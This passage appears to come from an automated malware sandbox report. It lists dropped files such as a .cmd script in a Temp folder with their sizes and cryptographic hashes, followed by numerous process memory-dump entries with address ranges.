b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

SHA512
859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\yabeql.cmd

Filesize
1.2MB

MD5
b5e5e096bc15d44c8a013699e1a3dd13

SHA1
ce162f58e3a72e414089008db282e22435acf21f

SHA256
64635af7d3e0bab77a46c403711a6587ea1e722bba28303355860712184de91b

SHA512
bf7ab978fc19525eb6bc9ed6faf76b008feaa357e755c9cf67c3545bb867e0b0b6930d061cf138b1adf9345cbbb118734d40ef0096c38c636bce400f55ada556

Download Submit
C:\Users\Admin\AppData\Local\Temp\yabeql.cmd.Jla

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
90e94aa9f404a73c4a7213b5454f8784

SHA1
aceffcca101a4ad380ad6bb283ae720390e6acb7

SHA256
622b2e16c82a90db23e3148ad094cdb32ee83cb139d9e5ed7d1b7a489c0d03a8

SHA512
aca4f90c0e030f3289ab3ae16bd3047dba0d4b11d75ded1a906c9531ad1074d1bdaf60bcd0e59650b6f9c4ce8a1633a3c80dbde0b2f17d4d240cbc2cc0c0f73d

Download Submit
memory/2488-58-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-66-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-16-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-6-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-20-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-22-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-24-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-26-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-28-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-30-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-32-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-34-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-38-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-36-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-40-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-42-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-44-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-46-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-48-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-50-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-52-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-54-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-56-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-0-0x0000000073D3E000-0x0000000073D3F000-memory.dmp

Filesize
4KB

Download
memory/2488-60-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-62-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-64-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-18-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-68-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-1042-0x0000000000A10000-0x0000000000A5C000-memory.dmp

Filesize
304KB

Download
memory/2488-1041-0x00000000064F0000-0x0000000006624000-memory.dmp

Filesize
1.2MB

Download
memory/2488-1043-0x0000000073D30000-0x000000007441E000-memory.dmp

Filesize
6.9MB

Download
memory/2488-1044-0x0000000073D3E000-0x0000000073D3F000-memory.dmp

Filesize
4KB

Download
memory/2488-1045-0x0000000073D30000-0x000000007441E000-memory.dmp

Filesize
6.9MB

Download
memory/2488-8-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-1053-0x0000000004F20000-0x0000000004F74000-memory.dmp

Filesize
336KB

Download
memory/2488-1-0x0000000000F50000-0x000000000110E000-memory.dmp

Filesize
1.7MB

Download
memory/2488-2-0x0000000073D30000-0x000000007441E000-memory.dmp

Filesize
6.9MB

Download
memory/2488-3-0x0000000004D70000-0x0000000004F22000-memory.dmp

Filesize
1.7MB

Download
memory/2488-4-0x0000000006210000-0x00000000063C4000-memory.dmp

Filesize
1.7MB

Download
memory/2488-5-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-10-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-2145-0x0000000073D30000-0x000000007441E000-memory.dmp

Filesize
6.9MB

Download
memory/2488-2146-0x0000000073D30000-0x000000007441E000-memory.dmp

Filesize
6.9MB

Download
memory/2488-14-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2488-12-0x0000000006210000-0x00000000063BE000-memory.dmp

Filesize
1.7MB

Download
memory/2520-2236-0x0000000019BD0000-0x0000000019EB2000-memory.dmp

Filesize
2.9MB

Download
memory/2520-2237-0x0000000000D10000-0x0000000000D18000-memory.dmp

Filesize
32KB

Download
memory/2520-2239-0x0000000000F10000-0x0000000000F3A000-memory.dmp

Filesize
168KB

Download
memory/4800-2128-0x0000000001F10000-0x0000000001F6C000-memory.dmp

Filesize
368KB

Download
memory/4800-1057-0x00000000049E0000-0x0000000004ABA000-memory.dmp

Filesize
872KB

Download
memory/4800-1056-0x00000000042E0000-0x00000000043B8000-memory.dmp

Filesize
864KB

Download
memory/4800-1054-0x00000000003A0000-0x0000000000484000-memory.dmp

Filesize
912KB

Download
memory/4956-1091-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/5488-2161-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/5488-2179-0x0000000005120000-0x0000000005182000-memory.dmp

Filesize
392KB

Download